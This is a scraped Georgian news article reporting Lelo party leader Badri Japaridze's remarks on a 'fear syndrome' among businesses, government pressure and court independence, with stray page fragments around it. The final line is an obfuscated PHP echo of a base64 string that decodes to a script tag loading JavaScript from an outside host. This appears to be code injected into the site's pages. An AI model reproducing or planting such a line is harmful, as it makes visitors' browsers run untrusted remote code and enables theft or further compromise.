celsiusi
ავერსი საქკაბელი
ჩვენი ამოცანააა და პოლტიკაშიც ამიტომ ვართ, რომ ერთხელ და სამუდამოდ შიშის სინდრომი გადავალახინოთ ბიზნესს, მეწარმეებს, რომ ისინი თუ რამე კრიტიკულს იტყვიან, - ეს განცხადება თიბისის ერთ-ერთმა დამფუძნებელმა და პარტია „ლელოს“ ლიდერმა ბადრი ჯაფარიძემ BMGTV-ის გადაცემა #რედაქტ2-ში ქვეყანაში არსებულ ბიზნესგარემოზე, ბიზნესის განწყობებსა და ზოგადად, კერძო სექტორის როლზე საუბრისას გააკეთა.
მისივე თქმით, ბიზნეში, არის შიშის სინდრომი, აუცილებეია ამის შეცვლა და ბიზნესს უნდა შეეძლოს საჭიროების შემთხვევაში კრიტიკის გამოთქმა თავისუფლად. 
"მამუკა ხაზარაძის და ბადრი ჯაფარძის დევნას როცა დაიწყებს მთავრობა... როდესაც ამდენ თავდასხმას დაინახავს მეწარმე, რას იფიქრებს?! – „მეც იგივე არ დამემართოს, ამიტომ სჯობს, ხმა არ ამოვიღო და ჩუმად ვიყოო“. ჩვენ გვინდა, რომ ამ ხელისუფლების ცვლილებასთან ერთად, ეს გარემოც შევცვალოთ და ყველას შეეძლოს მთავრობის ღია კრიტიკა, როცა გასაკრიტიკებელია და არ უნდა ჰქონდეს შიში, რომ ხვალ პროკურატურა დაადგება თავზე ან ზეგ საგადასახადო ორგანო მოიფიქრებს რაღაცას, მასზეგ პოლიტიკოსები დაესხმიან თავს და ა.შ. ამის შიში უნდა გავაქროთ.
როდესაც ხელისუფლება შეიცვლება და გვეყოლება ნამდვილად დემოკრატიული და კოალიციური მთავრობა, პირველი ამოცანა იქნება, მეწარმეებში შიშის გაქრობა."–განაცხადა ჯაფარიძემ. 
მან, ასევე აღნიშნა, რომ ყველამ უნდა იაქტიუროს არჩევნებზე და არ უნდა ჰქონდეს განცდა, რომ ყველაფერი თავისით გამოსწორდება. 
"არაფერი თავისით არ გამოსწორდება. ყველამ უნდა აიღოს პასუხისმგებლობა. უნდა იაქტიუროს არჩევნებზე და შეცვალოს ეს მოცემულობა. ჩვენი ამოცანა ის კი არ არის, რომ ვინმეს სამაგიერო გადავუხადოთ - არა. უნდა დამთავრდეს ამ ქვეყანაში სამაგიეროს გადახდა და რევანში. ჩვენი ამოცანაა, შევცვალოთ ბიზნესგარემო. პირველ რიგში, ამისთვის აუცილებელია კანონის უზენაესობის დამკვიდრება, დამოუკიდებელი სასამართლო სისტემის შექმნა და რაც მთავარია, ბიზნესისთვის ღიად თქმა, რომ „გაგვაკრიტიკეთ, როცა ხედავთ, რომ გასაკრიტიკებლები ვართ; ამისთვის თქვენ არავინ დაგესხმებათ თავს“ და ამის მაგალითი ბიზნესს სწორედ ხელისუფლებამ უნდა მისცეს. პირობას გაძლევთ, რომ ჩვენი ამოცანა იქნება, ადამიანებს გადავალახინოთ შიშის სინდრომი, რათა თავისუფლად და ღიად შეეძლოთ საუბარი იმ პრობლემებზე, რომელიც ქვეყანაშია, რომელსაც ბიზნესსექტორი ეჯახება და აკრიტიკონ ხელისუფლება, როცა ამის საჭიროებას ხედავენ.
პირველ რიგში, ბიზნესს აწუხებს არაკომპეტენტური ხელისუფლება, როდესაც მთავრობის თავმჯდომარე სრულიად არაკომპეტენტურია ეკონომიკაში და ანგარიშვალდებულია არა საზოგადოების, არამედ ერთი ადამიანის მიმართ" – აღნიშნა მან. 
ბადრი ჯაფარიძის თქმით,  სასამართლო არის სრულიად დაქვემდებარებული „ქართული ოცნებისადმი“ და თუკი პოლიტიკური ნებაა, რომ კონკრეტული ადამიანი იდევნოს, მაშინ შესაბამის განკარგულებას იღებს შერჩეული მოსამართლე და ნებისმიერ გადაწყვეტილებას მიიღებს, მათ შორის სრულიად აბსურდულსაც, როგორიც იყო (ხაზარაძე-ჯაფარიძის>) საქმის შემთხვევაში. ასეთი პრეცედენტები კი აფრთხობს უცხოურ ინვესტორებს.
331
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");